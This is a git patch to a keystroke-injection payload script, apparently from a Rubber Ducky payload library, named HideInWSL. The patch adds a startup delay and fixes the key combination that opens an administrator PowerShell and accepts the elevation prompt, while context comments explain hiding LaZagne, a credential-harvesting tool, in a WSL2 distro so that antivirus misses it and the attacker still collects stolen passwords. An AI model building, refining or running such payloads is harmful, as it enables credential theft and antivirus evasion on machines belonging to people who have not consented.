From 22d3cd27ca5012d4111ec0742a5e1d47e30f35b8 Mon Sep 17 00:00:00 2001
From: Artem <35617948+mylorik@users.noreply.github.com>
Date: Sun, 24 Sep 2023 18:02:30 -0400
Subject: [PATCH] refactoring

Added initial delay as per Kalani recommendation as well as fixed syntax error
---
 payloads/library/execution/HideInWSL/payload.txt | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/payloads/library/execution/HideInWSL/payload.txt b/payloads/library/execution/HideInWSL/payload.txt
index 15a76f6..c2a3066 100644
--- a/payloads/library/execution/HideInWSL/payload.txt
+++ b/payloads/library/execution/HideInWSL/payload.txt
@@ -10,6 +10,9 @@ REM While the antivirus cannot detect the downloaded file, it may be detected du
 REM In my testing, LaZagne.exe can be downloaded and executed, you will get the loot, the antivirus will detect the execution and kill the process at some point, but you will get all loot and the file will remain in the WSL2 distro                       
 
 
+REM initial enumeration delay
+DELAY 2000
+
 REM change to your target language
 DUCKY_LANG us
 
@@ -20,7 +23,7 @@ DELAY 100
 
 REM Open the Powershell as Administrator
 STRING powershell
-CTRL-SHIFT ENTER
+CTRL SHIFT ENTER
 DELAY 300
 ALT y